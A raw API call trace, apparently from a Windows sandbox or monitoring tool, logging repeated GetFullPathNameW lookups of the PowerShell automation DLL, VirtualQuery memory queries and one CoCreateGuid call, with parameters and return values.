	[0401.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.344] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.344] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.344] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.344] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.346] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.347] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0xc34fa919, Data2=0xa615, Data3=0x46fa, Data4=([0]=0xb6, [1]=0x3f, [2]=0xad, [3]=0x9d, [4]=0x5f, [5]=0x1c, [6]=0x47, [7]=0x3))) returned 0x0
	[0402.348] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.349] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.349] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.349] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.350] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.350] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.351] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.351] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.351] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.353] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.353] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.353] VirtualQuery (in: lpAddress=0x28bec0, lpBuffer=0x28cd80, dwLength=0x30 | out: lpBuffer=0x28cd80*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.353] VirtualQuery (in: lpAddress=0x28bf50, lpBuffer=0x28ce10, dwLength=0x30 | out: lpBuffer=0x28ce10*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
